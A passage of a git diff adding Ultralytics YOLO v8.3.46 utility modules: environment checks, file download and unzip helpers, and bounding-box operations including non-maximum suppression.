atol=0.5) # close to 0.5 absolute tolerance + + im = ASSETS / "bus.jpg" # image to check + LOGGER.info(f"{prefix}running Automatic Mixed Precision (AMP) checks...") + warning_msg = "Setting 'amp=True'. If you experience zero-mAP or NaN losses you can disable AMP with amp=False." + try: + from ultralytics import YOLO + + assert amp_allclose(YOLO("yolo11n.pt"), im) + LOGGER.info(f"{prefix}checks passed ✅") + except ConnectionError: + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " f"Offline and unable to download YOLO11n for AMP checks. {warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. + """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.46/utils/downloads.py b/2024.ultralytics/v8.3.46/utils/downloads.py new file mode 100644 index 0000000..be182f4 --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/downloads.py @@ -0,0 +1,507 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + [f"yolov5{k}{resolution}u.pt" for k in "nsmlx" for resolution in ("", "6")] + + [f"yolov3{k}u.pt" for k in ("", "-spp", "-tiny")] + + [f"yolov8{k}-world.pt" for k in "smlx"] + + [f"yolov8{k}-worldv2.pt" for k in "smlx"] + + [f"yolov9{k}.pt" for k in "tsmce"] + + [f"yolov10{k}.pt" for k in "nsmblx"] + + [f"yolo_nas_{k}.pt" for k in "sml"] + + [f"sam_{k}.pt" for k in "bl"] + + [f"FastSAM-{k}.pt" for k in "sx"] + + [f"rtdetr-{k}.pt" for k in "lx"] + + ["mobile_sam.pt"] + + ["calibration_image_sample_data_20x128x128x3_float32.npy.zip"] +) +GITHUB_ASSETS_STEMS = [Path(k).stem for k in GITHUB_ASSETS_NAMES] + + +def is_url(url, check=False): + """ + Validates if the given string is a URL and optionally checks if the URL exists online. + + Args: + url (str): The string to be validated as a URL. + check (bool, optional): If True, performs an additional check to see if the URL exists online. + Defaults to False. + + Returns: + (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online. + Returns False otherwise. + + Example: + ```python + valid = is_url("https://www.example.com") + ``` + """ + try: + url = str(url) + result = parse.urlparse(url) + assert all([result.scheme, result.netloc]) # check if is url + if check: + with request.urlopen(url) as response: + return response.getcode() == 200 # check if exists online + return True + except Exception: + return False + + +def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")): + """ + Deletes all ".DS_store" files under a specified directory. + + Args: + path (str, optional): The directory path where the ".DS_store" files should be deleted. + files_to_delete (tuple): The files to be deleted. + + Example: + ```python + from ultralytics.utils.downloads import delete_dsstore + + delete_dsstore("path/to/dir") + ``` + + Note: + ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They + are hidden system files and can cause issues when transferring files between different operating systems. + """ + for file in files_to_delete: + matches = list(Path(path).rglob(file)) + LOGGER.info(f"Deleting {file} files: {matches}") + for f in matches: + f.unlink() + + +def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True): + """ + Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is + named after the directory and placed alongside it. + + Args: + directory (str | Path): The path to the directory to be zipped. + compress (bool): Whether to compress the files while zipping. Default is True. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Returns: + (Path): The path to the resulting zip file. + + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. + """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = "https://drive.google.com/file/d/1cqT-cJgANNrhIHCrEufUYhQ4RqiWG_lJ/view?usp=drive_link" + url, filename = get_google_drive_file_info(link) + ``` + """ + file_id = link.split("/d/")[1].split("/view")[0] + drive_url = f"https://drive.google.com/uc?export=download&id={file_id}" + filename = None + + # Start session + with requests.Session() as session: + response = session.get(drive_url, stream=True) + if "quota exceeded" in str(response.content.lower()): + raise ConnectionError( + emojis( + f"❌ Google Drive file download quota exceeded. " + f"Please try again later or download this file manually at {link}." + ) + ) + for k, v in response.cookies.items(): + if k.startswith("download_warning"): + drive_url += f"&confirm={v}" # v is token + cd = response.headers.get("content-disposition") + if cd: + filename = re.findall('filename="(.+)"', cd)[0] + return drive_url, filename + + +def safe_download( + url, + file=None, + dir=None, + unzip=True, + delete=False, + curl=False, + retry=3, + min_bytes=1e0, + exist_ok=False, + progress=True, +): + """ + Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file. + + Args: + url (str): The URL of the file to be downloaded. + file (str, optional): The filename of the downloaded file. + If not provided, the file will be saved with the same name as the URL. + dir (str, optional): The directory to save the downloaded file. + If not provided, the file will be saved in the current working directory. + unzip (bool, optional): Whether to unzip the downloaded file. Default: True. + delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False. + curl (bool, optional): Whether to use curl command line tool for downloading. Default: False. + retry (int, optional): The number of times to retry the download in case of failure. Default: 3. + min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered + a successful download. Default: 1E0. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + progress (bool, optional): Whether to display a progress bar during the download. Default: True. + + Example: + ```python + from ultralytics.utils.downloads import safe_download + + link = "https://ultralytics.com/assets/bus.jpg" + path = safe_download(link) + ``` + """ + gdrive = url.startswith("https://drive.google.com/") # check if the URL is a Google Drive link + if gdrive: + url, file = get_google_drive_file_info(url) + + f = Path(dir or ".") / (file or url2file(url)) # URL converted to filename + if "://" not in str(url) and Path(url).is_file(): # URL exists ('://' check required in Windows Python<3.10) + f = Path(url) # filename + elif not f.is_file(): # URL and file do not exist + uri = (url if gdrive else clean_url(url)).replace( # cleaned and aliased url + "https://github.com/ultralytics/assets/releases/download/v0.0.0/", + "https://ultralytics.com/assets/", # assets alias + ) + desc = f"Downloading {uri} to '{f}'" + LOGGER.info(f"{desc}...") + f.parent.mkdir(parents=True, exist_ok=True) # make directory if missing + check_disk_space(url, path=f.parent) + for i in range(retry + 1): + try: + if curl or i > 0: # curl download with retry, continue + s = "sS" * (not progress) # silent + r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode + assert r == 0, f"Curl return value {r}" + else: # urllib download + method = "torch" + if method == "torch": + torch.hub.download_url_to_file(url, f, progress=progress) + else: + with request.urlopen(url) as response, TQDM( + total=int(response.getheader("Content-Length", 0)), + desc=desc, + disable=not progress, + unit="B", + unit_scale=True, + unit_divisor=1024, + ) as pbar: + with open(f, "wb") as f_opened: + for data in response: + f_opened.write(data) + pbar.update(len(data)) + + if f.exists(): + if f.stat().st_size > min_bytes: + break # success + f.unlink() # remove partial downloads + except Exception as e: + if i == 0 and not is_online(): + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Environment is not online.")) from e + elif i >= retry: + raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e + LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...") + + if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}: + from zipfile import is_zipfile + + unzip_dir = (dir or f.parent).resolve() # unzip to dir if provided else unzip in place + if is_zipfile(f): + unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress) # unzip + elif f.suffix in {".tar", ".gz"}: + LOGGER.info(f"Unzipping {f} to {unzip_dir}...") + subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True) + if delete: + f.unlink() # remove zip + return unzip_dir + + +def get_github_assets(repo="ultralytics/assets", version="latest", retry=False): + """ + Retrieve the specified version's tag and assets from a GitHub repository. If the version is not specified, the + function fetches the latest release assets. + + Args: + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + version (str, optional): The release version to fetch assets from. Defaults to 'latest'. + retry (bool, optional): Flag to retry the request in case of a failure. Defaults to False. + + Returns: + (tuple): A tuple containing the release tag and a list of asset names. + + Example: + ```python + tag, assets = get_github_assets(repo="ultralytics/assets", version="latest") + ``` + """ + if version != "latest": + version = f"tags/{version}" # i.e. tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. + download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. + + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.46/utils/ops.py b/2024.ultralytics/v8.3.46/utils/ops.py new file mode 100644 index 0000000..9a05b3a --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/ops.py @@ -0,0 +1,847 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). + """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. + """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. + max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. + """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = 